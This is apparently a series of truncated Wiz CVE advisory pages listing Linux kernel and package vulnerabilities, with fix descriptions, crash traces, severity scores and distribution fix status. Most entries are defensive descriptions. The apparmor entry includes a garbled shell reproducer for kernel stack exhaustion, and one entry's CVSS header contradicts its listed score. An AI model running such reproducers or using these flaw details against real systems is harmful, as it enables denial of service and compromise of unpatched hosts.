CVE-2025-68793 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2025-68793 CVE-2025-68793 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68793 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: fix a job->pasid access race in gpu recovery
Avoid a possible UAF in GPU recovery due to a race between
the sched timeout callback and the tdr work queue.
The gpu recovery function calls drm_sched_stop() and
later drm_sched_start(). drm_sched_start() restarts
the tdr queue which will eventually free the job. If
the tdr queue frees the job before time out callback
completes, the job will be freed and we'll get a UAF
when accessing the pasid. Cache it early to avoid the
UAF.
Example KASAN trace:
[ 493.058141] BUG: KASAN: slab-use-after-free in amdgpu_device_gpu_recover+0x968/0x990 [amdgpu]
[ 493.067530] Read of size 4 at addr ffff88b0ce3
Wiz
CVE-2023-54068 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2023-54068 CVE-2023-54068 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54068 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: compress: fix to call f2fs_wait_on_page_writeback() in f2fs_write_raw_pages()
BUG_ON() will be triggered when writing files concurrently,
because the same page is writtenback multiple times.
1597 void folio_end_writeback(struct folio *folio)
1598 {
......
1618 if (!__folio_end_writeback(folio))
1619 BUG();
......
1625 }
kernel BUG at mm/filemap.c:1619!
Call Trace: f2fs_write_end_io+0x1a0/0x370
blk_update_request+0x6c/0x410
blk_mq_end_request+0x15/0x130
blk_complete_reqs+0x3c/0x50
__do_softirq+0xb8/0x29b
? sort_range+0x20/0x20
run_ksoftirqd+0x19/0x20
smpboot_thread_fn+0x10b/0x1d0
kthread+0xde/0x110
? kthread_complete_and_exit+0x20/0x20
ret_fr
Wiz
CVE-2025-55816 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-55816 [MEDIUM] CVE-2025-55816 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-55816 :
Linux Debian vulnerability analysis and mitigation
HotelDruid v3.0.7 and before is vulnerable to Cross Site Scripting (XSS) in the /modifica_app.php file.
Source : NVD
## 6.1
Score
Published December 11, 2025
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
hoteldruid
Sources
NVD
Debian 11, 12 Severity MEDIUM No Fix Added at: Dec 12, 2025
Echo Severity MEDIUM No Fix Added at: Dec 12, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what
Wiz
CVE-2025-40932 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2025-40932 [HIGH] CVE-2025-40932 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-40932 :
Linux Debian vulnerability analysis and mitigation
Apache::SessionX versions through 2.01 for Perl create insecure session id.
Apache::SessionX generates session ids insecurely. The default session id generator in Apache::SessionX::Generate::MD5 returns a MD5 hash seeded with the built-in rand() function, the epoch time, and the PID. The PID will come from a small set of numbers, and the epoch time may be guessed, if it is not leaked from the HTTP Date header. The built-in rand function is unsuitable for cryptographic usage. Predicable session ids could allow an attacker to gain access to systems.
Source : NVD
## 8.2
Score
Published February 27, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Ex
Wiz
CVE-2026-23092 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23092 [HIGH] CVE-2026-23092 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23092 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
iio: dac: ad3552r-hs: fix out-of-bound write in ad3552r_hs_write_data_source
When simple_write_to_buffer() succeeds, it returns the number of bytes
actually copied to the buffer. The code incorrectly uses 'count'
as the index for null termination instead of the actual bytes copied.
If count exceeds the buffer size, this leads to out-of-bounds write.
Add a check for the count and use the return value as the index.
The bug was validated using a demo module that mirrors the original
code and was tested under QEMU.
Pattern of the bug:
A fixed 64-byte stack buffer is filled using count.
If count > 64, the code still does buf[count] = '\0', causing an
Wiz
CVE-2026-23134 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-23134 [MEDIUM] CVE-2026-23134 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23134 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
slab: fix kmalloc_nolock() context check for PREEMPT_RT
On PREEMPT_RT kernels, local_lock becomes a sleeping lock. The current
check in kmalloc_nolock() only verifies we're not in NMI or hard IRQ
context, but misses the case where preemption is disabled.
When a BPF program runs from a tracepoint with preemption disabled
(preempt_count > 0), kmalloc_nolock() proceeds to call
local_lock_irqsave() which attempts to acquire a sleeping lock,
triggering:
BUG: sleeping function called from invalid context
in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 6128
preempt_count: 2, expected: 0
Fix this by checking !preemptible() on PREEMPT_RT, which dir
Wiz
CVE-2026-27853 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-27853 [MEDIUM] CVE-2026-27853 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27853 :
Linux Debian vulnerability analysis and mitigation
An attacker might be able to trigger an out-of-bounds write by sending crafted DNS responses to a DNSdist using the DNSQuestion:changeName or DNSResponse:changeName methods in custom Lua code. In some cases the rewritten packet might become larger than the initial response and even exceed 65535 bytes, potentially leading to a crash resulting in denial of service.
Source : NVD
## 5.9
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
dnsdist
Sou
Wiz
CVE-2026-4775 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4775 [MEDIUM] CVE-2026-4775 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4775 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in the libtiff library. A remote attacker could exploit a signed integer overflow vulnerability in the putcontig8bitYCbCr44tile function by providing a specially crafted TIFF file. This flaw can lead to an out-of-bounds heap write due to incorrect memory pointer calculations, potentially causing a denial of service (application crash) or arbitrary code execution.
Source : NVD
## 7.8
Score
Published March 24, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.9
Exploitation Probability (EPSS) 0.1
Affected packages and
Wiz
CVE-2026-23404 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23404 [MEDIUM] CVE-2026-23404 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23404 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: replace recursive profile removal with iterative approach
The profile removal code uses recursion when removing nested profiles,
which can lead to kernel stack exhaustion and system crashes.
Reproducer:
$ pf='a'; for ((i=0; i /sys/kernel/security/apparmor/.remove
Replace the recursive __aa_profile_list_release() approach with an
iterative approach in __remove_profile(). The function repeatedly
finds and removes leaf profiles until the entire subtree is removed,
maintaining the same removal semantic without recursion.
Source : NVD
Published April 1, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Explo
Wiz
CVE-2023-54192 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2023-54192 [MEDIUM] CVE-2023-54192 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-54192 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix null pointer panic in tracepoint in __replace_atomic_write_block
We got a kernel panic if old_addr is NULL.
https://bugzilla.kernel.org/show_bug.cgi?id=217266
BUG: kernel NULL pointer dereference, address: 0000000000000000
Call Trace: f2fs_commit_atomic_write+0x619/0x990 [f2fs a1b985b80f5babd6f3ea778384908880812bfa43]
__f2fs_ioctl+0xd8e/0x4080 [f2fs a1b985b80f5babd6f3ea778384908880812bfa43]
? vfs_write+0x2ae/0x3f0
? vfs_write+0x2ae/0x3f0
__x64_sys_ioctl+0x91/0xd0
do_syscall_64+0x5c/0x90
entry_SYSCALL_64_after_hwframe+0x72/0xdc
RIP: 0033:0x7f69095fe53f
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux
Wiz
CVE-2026-2597 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-2597 [HIGH] CVE-2026-2597 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2597 :
Linux Debian vulnerability analysis and mitigation
Crypt::SysRandom::XS versions before 0.010 for Perl is vulnerable to a heap buffer overflow in the XS function random_bytes().
The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) is supplied, the expression length + 1u causes an integer wraparound, resulting in a zero-byte allocation. The subsequent call to chosen random function (e.g. getrandom) passes the original negative value, which is implicitly converted to a large unsigned value (typically SIZE_MAX). This can result in writes beyond the allocated buffer, leading to heap memory corruption and application crash (denial of service).
In common usage, the length argument is typically hardcoded by the caller, whic
Wiz
CVE-2026-1765 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-1765 [MEDIUM] CVE-2026-1765 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1765 :
Linux Debian vulnerability analysis and mitigation
[Heap Buffer Overflow in GNOME localsearch MP3 Extractor (TXXX Tags)]
Source : NVD
Published February 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
localsearch-debuginfo
localsearch-debugsource
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM No Fix Added at: Feb 04, 2026
Debian 14 Has Fix Added at: Feb 04, 2026
Echo No Fix Added at: Feb 04, 2026
Red Hat 8, 9, 10 Severity MEDIUM No Fix Added at: Feb 04, 2026
Ubuntu 18.04, 20.04 Severity MEDIUM No Fix Added at: Feb 20, 202
Wiz
CVE-2025-66004 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2025-66004 [MEDIUM] CVE-2025-66004 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-66004 :
Linux Debian vulnerability analysis and mitigation
A Path Traversal vulnerability in usbmuxd allows local users to escalate to the service user.This issue affects usbmuxd: before 3ded00c9985a5108cfc7591a309f9a23d57a8cba.
Source : NVD
## 5.1
Score
Published December 10, 2025
Severity MEDIUM
CNA Score 5.1
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
usbmuxd
usbmuxd-debuginfo
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Dec 11, 2025
Echo Severity MEDIUM Has Fix Added at: Dec 11, 2025
Red Hat 6, 7, 8 Severity MEDIUM
Wiz
CVE-2026-23342 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23342 CVE-2026-23342 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23342 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix race in cpumap on PREEMPT_RT
On PREEMPT_RT kernels, the per-CPU xdp_bulk_queue (bq) can be accessed
concurrently by multiple preemptible tasks on the same CPU.
The original code assumes bq_enqueue() and __cpu_map_flush() run
atomically with respect to each other on the same CPU, relying on
local_bh_disable() to prevent preemption. However, on PREEMPT_RT,
local_bh_disable() only calls migrate_disable() (when
PREEMPT_RT_NEEDS_BH_LOCK is not set) and does not disable
preemption, which allows CFS scheduling to preempt a task during
bq_flush_to_queue(), enabling another task on the same CPU to enter
bq_enqueue() and operate on the same per-CPU
Wiz
CVE-2022-50729 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50729 [MEDIUM] CVE-2022-50729 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50729 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: Fix resource leak in ksmbd_session_rpc_open()
When ksmbd_rpc_open() fails then it must call ksmbd_rpc_id_free() to
undo the result of ksmbd_ipc_id_alloc().
Source : NVD
Published December 24, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-azure-fips
Sources
NVD
Debian 12, 13, 14 Has Fix Added at: Dec 26, 2025
Echo Has Fix Added at: Dec 26, 2025
Ubuntu 16.04, 18.04 Severity MEDI
Wiz
CVE-2025-68812 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68812 [MEDIUM] CVE-2025-68812 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68812 :
Linux Debian vulnerability analysis and mitigation
Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
Source : NVD
Published January 13, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-hwe-6.17
linux-fips
Sources
NVD
Debian 14 Has Fix Added at: Jan 14, 2026
Ubuntu 16.04, 18.04, 20.04 Severity MEDIUM No Fix Added at: Jan 15, 2026
Ubuntu 24.04, 25.10 Severity MEDIUM No Fix Added at: Jan 18, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you c
Wiz
CVE-2026-27474 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-27474 [MEDIUM] CVE-2026-27474 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27474 :
Linux Debian vulnerability analysis and mitigation
SPIP before 4.4.9 allows Cross-Site Scripting (XSS) in the private area, complementing an incomplete fix from SPIP 4.4.8. The echappe_anti_xss() function was not systematically applied to input, form, button, and anchor (a) HTML tags, allowing an attacker to inject malicious scripts through these elements. This vulnerability is not mitigated by the SPIP security screen.
Source : NVD
## 4.8
Score
Published February 19, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
s
Wiz
CVE-2025-6595 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-6595 [MEDIUM] CVE-2025-6595 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-6595 :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MultimediaViewer.This issue affects MultimediaViewer: from * before 1.39.13, 1.42.7, 1.43.2, 1.44.0.
Source : NVD
Published February 2, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13 Severity MEDIUM Has Fix Added at: Jul 03, 2025
Debian 14 Severity MEDIUM Has Fix Added at: Aug 10, 2025
Echo Severity ME
Wiz
CVE-2025-59030 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-59030 [HIGH] CVE-2025-59030 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59030 :
Linux Debian vulnerability analysis and mitigation
An attacker can trigger the removal of cached records by sending a NOTIFY query over TCP.
Source : NVD
## 7.5
Score
Published December 9, 2025
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
pdns-recursor
Sources
NVD
Alpine 3.22, 3.23 Severity HIGH Has Fix Added at: Dec 14, 2025
Alpine edge Severity HIGH Has Fix Added at: Dec 09, 2025
Debian 11, 12 Severity HIGH No Fix Added at: Dec 09, 2025
Debian 13, 14 Severity HIGH Has Fix Added at: Dec 09, 2025
Echo Seve
Wiz
CVE-2025-14934 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-14934 [HIGH] CVE-2025-14934 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14934 :
Linux Debian vulnerability analysis and mitigation
NSF Unidata NetCDF-C Variable Name Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NSF Unidata NetCDF-C. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within the parsing of variable names. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27267.
Source : NVD
## 7.8
Score
Published Decembe
Wiz
CVE-2026-23406 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23406 [HIGH] CVE-2026-23406 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23406 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix side-effect bug in match_char() macro usage
The match_char() macro evaluates its character parameter multiple
times when traversing differential encoding chains. When invoked
with *str++, the string pointer advances on each iteration of the
inner do-while loop, causing the DFA to check different characters
at each iteration and therefore skip input characters.
This results in out-of-bounds reads when the pointer advances past
the input buffer boundary.
[ 94.984676] ==================================================================
[ 94.985301] BUG: KASAN: slab-out-of-bounds in aa_dfa_match+0x5ae/0x760
[ 94.985655] Read of size 1 at ad
Wiz
CVE-2026-2574 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-2574 [MEDIUM] CVE-2026-2574 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2574 :
Linux Debian vulnerability analysis and mitigation
OOB Read in OpenSSL backend
Source : NVD
Published February 18, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
glib-networking
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW No Fix Added at: Feb 18, 2026
Echo No Fix Added at: Feb 18, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux Debian vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV
Wiz
CVE-2025-71115 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2025-71115 [MEDIUM] CVE-2025-71115 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71115 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
um: init cpu_tasks[] earlier
This is currently done in uml_finishsetup(), but e.g. with
KCOV enabled we'll crash because some init code can call
into e.g. memparse(), which has coverage annotations, and
then the checks in check_kcov_mode() crash because current
is NULL.
Simply initialize the cpu_tasks[] array statically, which
fixes the crash. For the later SMP work, it seems to have
not really caused any problems yet, but initialize all of
the entries anyway.
Source : NVD
## 5.5
Score
Published January 14, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
Wiz
CVE-2026-23077 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-23077 [HIGH] CVE-2026-23077 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23077 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
mm/vma: fix anon_vma UAF on mremap() faulted, unfaulted merge
Patch series "mm/vma: fix anon_vma UAF on mremap() faulted, unfaulted
merge", v2.
Commit 879bca0a2c4f ("mm/vma: fix incorrectly disallowed anonymous VMA
merges") introduced the ability to merge previously unavailable VMA merge
scenarios.
However, it is handling merges incorrectly when it comes to mremap() of a
faulted VMA adjacent to an unfaulted VMA. The issues arise in three
cases:
Previous VMA unfaulted:
copied -----|
v
|-----------|.............|
| unfaulted |(faulted VMA)|
|-----------|.............|
prev
Next VMA unfaulted:
copied -----|
v
|.............|-----------|
|(faulted
Wiz
CVE-2026-33549 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.7
CVE-2026-33549 [MEDIUM] CVE-2026-33549 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33549 :
Linux Debian vulnerability analysis and mitigation
SPIP 4.4.10 through 4.4.12 before 4.4.13 allows unintended privilege assignment (of administrator privileges) during the editing of an author data structure because of STATUT mishandling.
Source : NVD
## 6.7
Score
Published March 22, 2026
Severity MEDIUM
CNA Score 6.7
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
spip
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Mar 22, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Mar 22, 2026
Echo Severity MEDIUM Has Fix Added at: Mar 22, 202
Wiz
CVE-2025-69412 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.4
CVE-2025-69412 [LOW] CVE-2025-69412 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69412 :
Linux Debian vulnerability analysis and mitigation
KDE messagelib before 25.11.90 ignores SSL errors for threatMatches:find in the Google Safe Browsing Lookup API (aka phishing API), which might allow spoofing of threat data. NOTE: this Lookup API is not contacted in the messagelib default configuration.
Source : NVD
## 3.4
Score
Published January 1, 2026
Severity LOW
CNA Score 3.4
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
kf5-messagelib
messagelib
Sources
NVD
Alpine 3.23 Severity LOW Has Fix Added at: Jan 11, 2026
Debian 11, 12, 13
Wiz
CVE-2025-32735 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2025-32735 [MEDIUM] CVE-2025-32735 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-32735 :
Linux Debian vulnerability analysis and mitigation
Improper conditions check in some firmware for some Intel(R) NPU Drivers within Ring 1: Device Drivers may allow a denial of service. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts.
Source : NVD
## 6.8
Score
Published February 10, 2026
Sever
Wiz
CVE-2026-30405 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-30405 [HIGH] CVE-2026-30405 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30405 :
Linux Debian vulnerability analysis and mitigation
An issue in GoBGP gobgpd v.4.2.0 allows a remote attacker to cause a denial of service via the NEXT_HOP path attribute
Source : NVD
## 7.5
Score
Published March 16, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 34.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
github.com/osrg/gobgp/v4
gobgp
Sources
NVD
Debian 11 Severity MEDIUM No Fix Added at: Mar 17, 2026
Debian 12, 13 Severity HIGH No Fix Added at: Mar 17, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 17, 2026
Echo Severity HIGH No Fix Added at: Mar
Wiz
CVE-2025-68240 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2025-68240 [MEDIUM] CVE-2025-68240 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68240 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: avoid having an active sc_timer before freeing sci
Because kthread_stop did not stop sc_task properly and returned -EINTR,
the sc_timer was not properly closed, ultimately causing the problem [1]
reported by syzbot when freeing sci due to the sc_timer not being closed.
Because the thread sc_task main function nilfs_segctor_thread() returns 0
when it succeeds, when the return value of kthread_stop() is not 0 in
nilfs_segctor_destroy(), we believe that it has not properly closed
sc_timer.
We use timer_shutdown_sync() to sync wait for sc_timer to shutdown, and
set the value of sc_task to NULL under the protection of lock
sc_state_lock, so as
Wiz
CVE-2026-1539 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-1539 [MEDIUM] CVE-2026-1539 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-1539 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in the libsoup HTTP library that can cause proxy authentication credentials to be sent to unintended destinations. When handling HTTP redirects, libsoup removes the Authorization header but does not remove the Proxy-Authorization header if the request is redirected to a different host. As a result, sensitive proxy credentials may be leaked to third-party servers. Applications using libsoup for HTTP communication may unintentionally expose proxy authentication data.
Source : NVD
## 5.8
Score
Published January 28, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-23405 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23405 [MEDIUM] CVE-2026-23405 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23405 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
apparmor: fix: limit the number of levels of policy namespaces
Currently the number of policy namespaces is not bounded relying on
the user namespace limit. However policy namespaces aren't strictly
tied to user namespaces and it is possible to create them and nest
them arbitrarily deep which can be used to exhaust system resource.
Hard cap policy namespaces to the same depth as user namespaces.
Source : NVD
Published April 1, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.3
Explo
Wiz
CVE-2026-23400 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23400 CVE-2026-23400 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23400 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
rust_binder: call set_notification_done() without proc lock
Consider the following sequence of events on a death listener:
The remote process dies and sends a BR_DEAD_BINDER message.
The local process invokes the BC_CLEAR_DEATH_NOTIFICATION command.
The local process then invokes the BC_DEAD_BINDER_DONE.Then, the kernel will reply to the BC_DEAD_BINDER_DONE command with aBR_CLEAR_DEATH_NOTIFICATION_DONE reply using push_work_if_looper().
However, this can result in a deadlock if the current thread is not a
looper. This is because dead_binder_done() still holds the proc lock
during set_notification_done(), which called push_work_if_looper().
Norm
Wiz
CVE-2026-23283 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23283 [MEDIUM] CVE-2026-23283 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23283 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
regulator: fp9931: Fix PM runtime reference leak in fp9931_hwmon_read()
In fp9931_hwmon_read(), if regmap_read() failed, the function returned
the error code without calling pm_runtime_put_autosuspend(), causing
a PM reference leak.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
Sources
NVD
